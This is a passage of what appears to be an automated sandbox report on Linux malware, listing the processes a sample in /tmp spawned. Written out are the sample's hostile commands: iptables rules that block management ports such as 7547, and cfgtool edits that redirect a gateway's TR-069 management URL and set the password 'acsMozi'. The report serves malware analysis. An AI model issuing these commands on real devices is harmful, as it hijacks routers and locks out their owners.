                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I POSTROUTING -t nat -p tcp --sport 54753 -j ACCEPT
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:16
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:21
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:26
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I INPUT -p tcp --dport 58000 -j DROP
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I INPUT -p tcp --dport 35000 -j DROP
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I INPUT -p tcp --dport 50023 -j DROP
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I INPUT -p tcp --dport 7547 -j DROP
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:32
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I INPUT -p udp --destination-port 8000 -j ACCEPT"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I INPUT -p udp --destination-port 8000 -j ACCEPT
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I OUTPUT -p udp --source-port 8000 -j ACCEPT"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I OUTPUT -p udp --source-port 8000 -j ACCEPT
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 8000 -j ACCEPT"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I PREROUTING -t nat -p udp --destination-port 8000 -j ACCEPT
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 8000 -j ACCEPT"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I POSTROUTING -t nat -p udp --source-port 8000 -j ACCEPT
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I INPUT -p udp --dport 8000 -j ACCEPT"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I INPUT -p udp --dport 8000 -j ACCEPT
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I OUTPUT -p udp --sport 8000 -j ACCEPT"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I OUTPUT -p udp --sport 8000 -j ACCEPT
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
